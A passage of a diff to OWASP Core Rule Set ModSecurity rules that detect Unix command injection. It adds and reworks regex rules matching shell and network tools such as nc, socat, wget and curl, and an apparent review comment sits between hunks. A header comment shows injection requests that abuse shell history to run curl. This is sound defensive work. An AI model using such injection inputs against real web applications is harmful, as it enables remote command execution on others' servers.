\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?)?h|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)[\s\v&\)<>\|]" \ + "id:932250,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + 
tag:'application-multi',\
+ tag:'language-shell',\
+ tag:'platform-unix',\
+ tag:'attack-rce',\
+ tag:'paranoia-level/1',\
+ tag:'OWASP_CRS',\
+ tag:'capec/1000/152/248/88',\
+ tag:'PCI/6.5.2',\
+ ver:'OWASP_CRS/4.0.0',\
+ severity:'CRITICAL',\
+ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+
+# [ Unix command injection ]
+#
+# This rule complements rule 932250 for commands of 4 characters and up.
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932260.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932260 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9
\?-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:a(?:ddgroup|xel[\s\v&\)<>\|])|b(?:ase(?:32|64|nc)|lkid|sd(?:cat|iff|tar)|u(?:iltin|nzip2|sybox)|yobu|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:h(?:g(?:passwd|rp)|pass|sh)|lang\+\+|o(?:mm[\s\v&\)<>\|]|proc)|ron)|d(?:iff[\s\v&\)<>\|]|mesg|oas)|e(?:2fsck|grep)|f(?:grep|iletest|tp(?:stats|who))|g(?:r(?:ep[\s\v&\)<>\|]|oupmod)|unzip|z(?:cat|exe|ip))|htop|l(?:ast(?:comm|log(?:in)?)|ess(?:echo|(?:fil|pip)e)|ftp(?:get)?|osetup|s(?:-F|b_release|cpu|mod|of|pci|usb)|wp-download|z(?:4c(?:at)?|c(?:at|mp)|diff|[e-f]?grep|less|m(?:a(?:dec|info)?|ore)))|m(?:a(?:ilq|ster\.passwd)|k(?:fifo|nod|temp)|locate|ysql(?:admin|dump(?:slow)?|hotcopy|show))|n(?:c(?:\.(?:openbsd|traditional)|at)|et(?:(?:c|st)at|kit-ftp|plan)|ohup|ping|stat)|onintr|p(?:dksh|er(?:f[\s\v&\)<>\|]|l[\s\v&\)5<>\|])|(?:ft|gre)p|hp(?:-cgi|[57])|igz|k(?:exec|ill)|(?:op
|se)d|rint(?:env|f[\s\v&\)<>\|])|tar(?:diff|grep)?|wd\.db|y(?:thon[2-3]|3?versions))|r(?:(?:bas|ealpat)h|m(?:dir[\s\v&\)<>\|]|user)|nano|sync)|s(?:diff|e(?:ndmail|t(?:env|sid))|ftp|(?:h\.distri|pwd\.d)b|ocat|td(?:err|in|out)|udo|ysctl)|t(?:ailf|c(?:p(?:ing|traceroute)|sh)|elnet|imeout[\s\v&\)<>\|]|raceroute6?)|u(?:n(?:ame|lz(?:4|ma)|(?:pig|x)z|rar|zstd)|ser(?:(?:ad|mo)d|del))|vi(?:gr|pw)|w(?:get|hoami)|x(?:args|z(?:c(?:at|mp)|d(?:ec|iff)|[e-f]?grep|less|more))|z(?:c(?:at|mp)|diff|[e-f]?grep|ip(?:c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|less|more|run|std(?:(?:ca|m)t|grep|less)?))" \ + "id:932260,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'Remote Command Execution: Direct Unix Command Execution',\ + logdata:'Matched Data: %{TX.0} found within %{TX.932260_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-shell',\ + tag:'platform-unix',\ + tag:'attack-rce',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248/88',\ + tag:'PCI/6.5.2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.932260_matched_var_name=%{matched_var_name}',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# [ Unix shell history invocation ] +# +# Detects Unix shell history invocations in any context. # -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932150.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl +# Example: +# GET /?rce=example.com +# GET /?rce=curl%20 +# GET /?rce=!-1!-2 # -# Then insert the assembled regexp into this template: +# Will execute `curl example.com`. We should be able to detect the '!-' sequence with a very low risk of false-positives since the sequence is very specific +# and does not allow for whitespaces in between. 
# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932150.txt] -# [\\\\'\"]*(?:\s|;|\||&|<|>)" \ +# This rule has stricter siblings: +# * 932331 (PL3) # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:^|=)\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:l[\\\\'\"]*(?:s(?:[\\\\'\"]*(?:b[\\\\'\"]*_[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*a[\\\\'\"]*s[\\\\'\"]*e|c[\\\\'\"]*p[\\\\'\"]*u|m[\\\\'\"]*o[\\\\'\"]*d|p[\\\\'\"]*c[\\\\'\"]*i|u[\\\\'\"]*s[\\\\'\"]*b|-[\\\\'\"]*F|o[\\\\'\"]*f))?|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|m[\\\\'\"]*(?:o[\\\\'\"]*r[\\\\'\"]*e|a)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s)|e[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*(?:(?:f[\\\\'\"]*i[\\\\'\"]*l|p[\\\\'\"]*i[\\\\'\"]*p)[\\\\'\"]*e|e[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*o)|a[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*g(?:[\\\\'\"]*i[\\\\'\"]*n)?|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*m)|w[\\\\'\"]*p(?:[\\\\'\"]*-[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*d)?|f[\\\\'\"]*t[\\\\'\"]*p(?:[\\\\'\"]*g[\\\\'\"]*e[\\\\'\"]*t)?|y[\\\\'\"]*n[\\\\'\"]*x)|s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d)|h(?:[\\\\'\"]*\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b)?|o[\\\\'\"]*(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]
*l|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|f[\\\\'\"]*t[\\\\'\"]*p|u[\\\\'\"]*d[\\\\'\"]*o|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|k[\\\\'\"]*(?:e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*v|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|e[\\\\'\"]*r[\\\\'\"]*l(?:[\\\\'\"]*5)?|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|o[\\\\'\"]*p[\\\\'\"]*d)|n[\\\\'\"]*(?:c(?:[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|a[\\\\'\"]*t))?|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t)|o[\\\\'\"]*h[\\\\'\"]*u[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|i[\\\\'\"]*m[\\\\'\"]*e(?:[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t)?|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r)|e[\\\\'\"]*l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|m[\\\\'\"]*(?:u[\\\\'\"]*s[\\\\'\"]*e|d[\\\\'\"]*i)[\\\\'\"]*r|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|s[\\\\'\"]*y[\\\\'\"]
*n[\\\\'\"]*c|c[\\\\'\"]*p)|b[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|c[\\\\'\"]*a[\\\\'\"]*t)|s[\\\\'\"]*d[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*f[\\\\'\"]*f|t[\\\\'\"]*a[\\\\'\"]*r)|u[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*n|a[\\\\'\"]*s[\\\\'\"]*h)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w)|l[\\\\'\"]*o[\\\\'\"]*c[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*e|a[\\\\'\"]*i[\\\\'\"]*l[\\\\'\"]*q)|u[\\\\'\"]*(?:n[\\\\'\"]*(?:c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|l[\\\\'\"]*z[\\\\'\"]*m[\\\\'\"]*a|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l))|x[\\\\'\"]*(?:z(?:[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e))?|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s)|z[\\\\'\"]*(?:(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e|i)[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|f[\\\\'\"]*(?:t[\\\\'\"]*p[\\\\'\"]*(?:s[\\\\'\"]*t[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*s|w[\\\\'\"]*h[\\\\'\"]*o)|i[\\\\'\"]*l[\\\\'\"]*e[\\\\'\"]*t[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*t|e[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*h|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p)|c[\\\\'\"]*(?:o[\\\\'\"]*(?:m[\\\\'\"]*m[\\
\\'\"]*a[\\\\'\"]*n[\\\\'\"]*d|p[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*c)|u[\\\\'\"]*r[\\\\'\"]*l|s[\\\\'\"]*h|c)|e[\\\\'\"]*(?:g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*h[\\\\'\"]*o|v[\\\\'\"]*a[\\\\'\"]*l|x[\\\\'\"]*e[\\\\'\"]*c|n[\\\\'\"]*v)|d[\\\\'\"]*(?:m[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*g|a[\\\\'\"]*s[\\\\'\"]*h|i[\\\\'\"]*f[\\\\'\"]*f|o[\\\\'\"]*a[\\\\'\"]*s)|g[\\\\'\"]*(?:z[\\\\'\"]*(?:c[\\\\'\"]*a[\\\\'\"]*t|i[\\\\'\"]*p)|r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*c)|j[\\\\'\"]*(?:o[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*\s+[\\\\'\"]*-[\\\\'\"]*x|a[\\\\'\"]*v[\\\\'\"]*a)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*i|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|i[\\\\'\"]*r[\\\\'\"]*b(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|o[\\\\'\"]*n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r|h[\\\\'\"]*(?:e[\\\\'\"]*a[\\\\'\"]*d|u[\\\\'\"]*p)|v[\\\\'\"]*i[\\\\'\"]*(?:g[\\\\'\"]*r|p[\\\\'\"]*w)|G[\\\\'\"]*E[\\\\'\"]*T)[\\\\'\"]*(?:\s|;|\||&|<|>)" \ - "id:932150,\ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx !-\d" \ + "id:932330,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Remote Command Execution: Direct Unix Command Execution',\ + msg:'Remote Command Execution: Unix shell history invocation',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ @@ -456,11 +528,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # [ Unix shell snippets ] 
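Review bot: 932260 copies the matched variable name into a transaction variable with `setvar:'tx.932260_matched_var_name=%{matched_var_name}'` and reads it back in logdata as `%{TX.932260_MATCHED_VAR_NAME}`, while its sibling 932250 (and the new 932330) use `%{MATCHED_VAR_NAME}` in logdata directly; if this indirection works around an engine quirk, a comment above the 932260 SecRule such as `# MATCHED_VAR_NAME is copied into a tx variable because <reason>` should say which, otherwise the two sibling rules should use the same form. The 932330 header claims the `!-` sequence has a very low false-positive risk, but the rule regex is `!-\d`, which also fires on ordinary prose such as `Wow!-1` (constructed example); the comment should either point to the regression corpus that backs the claim or the pattern should be tightened (for instance anchoring on a preceding separator). Minor: in the 932250 header `Additionaly` should read `Additionally`. This hunk also removes 932150 outright; the 932250/932260 headers name the replacement relations, which is good, but a one-line "replaces 932150" mention would help anyone with a 932150 exclusion in their tuning.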
@@ -471,6 +542,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
# have been added here with their full path, in order to catch some
# cases where the full path is sent.
#
+# Rule relations:
+#
+# .932160 (base rule, PL1, unix shell commands with full path)
+# ..932161 (stricter sibling, PL2, unix shell commands with full path in User-Agent and Referer request headers)
+#
# This rule is also triggered by an Apache Struts Remote Code Execution exploit:
# [ Apache Struts vulnerability CVE-2017-9805 - Exploit tested: https://www.exploit-db.com/exploits/42627 ]
#
@@ -482,7 +558,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
phase:2,\
block,\
capture,\
- t:none,t:urlDecodeUni,t:cmdLine,t:normalizePath,t:lowercase,\
+ t:none,t:cmdLine,t:normalizePath,\
msg:'Remote Command Execution: Unix Shell Code Found',\
logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\
tag:'application-multi',\
@@ -493,11 +569,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
tag:'OWASP_CRS',\
tag:'capec/1000/152/248/88',\
tag:'PCI/6.5.2',\
- ctl:auditLogParts=+E,\
- ver:'OWASP_CRS/3.3.0',\
+ ver:'OWASP_CRS/4.0.0',\
severity:'CRITICAL',\
setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\
- setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
+ setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'"
# [ Shellshock vulnerability (CVE-2014-6271 and CVE-2014-7169) ]
@@ -511,7 +586,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
#
SecRule REQUEST_HEADERS|REQUEST_LINE "@rx ^\(\s*\)\s+{" \
"id:932170,\
- phase:2,\
+ phase:1,\
block,\
capture,\
t:none,t:urlDecode,\
